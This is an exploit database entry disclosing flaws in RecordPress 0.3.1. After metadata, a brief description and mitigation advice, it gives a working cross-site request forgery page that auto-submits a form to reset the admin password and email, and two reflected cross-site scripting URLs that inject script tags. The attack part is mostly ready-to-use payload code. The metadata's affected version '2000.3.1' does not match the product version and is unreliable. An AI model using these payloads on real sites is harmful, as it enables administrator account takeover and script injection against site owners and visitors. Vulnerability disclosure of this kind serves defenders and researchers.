WebApplication : RecordPress 0.3.1

vendor:

RecordPress

by:

Khashayar Fereidani

5.5

CVSS

MEDIUM

CSRF ( Change Admin Password ) And XSS

352, 79

CWE

Product Name: RecordPress

Affected Version From: 2000.3.1

Affected Version To: 2000.3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:recordpress:recordpress:0.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

WebApplication : RecordPress 0.3.1

A CSRF vulnerability exists in RecordPress 0.3.1 which allows an attacker to change the admin password. An XSS vulnerability also exists which allows an attacker to inject malicious JavaScript code into the application.

Mitigation:

Implementing a CSRF token in the application and validating it on the server side can help mitigate this vulnerability. Additionally, input validation should be implemented to prevent XSS attacks.

Source

Exploit-DB raw data:

----------------------------------------------------------------
WebApplication : RecordPress 0.3.1
Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.recordpress.org/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";

method="POST" name="form">

<input type="hidden" name="formusername" value="admin">

<input type="hidden" name="formname" value="admin">

<input type="hidden" name="formemail" value="email@pwnedpwnedpwned.sss">

<input type="hidden" name="formpass" value="password">

<input type="hidden" name="formpass2" value="password">

<input type="hidden" name="formadminstatus" value="2">

<input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">


</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>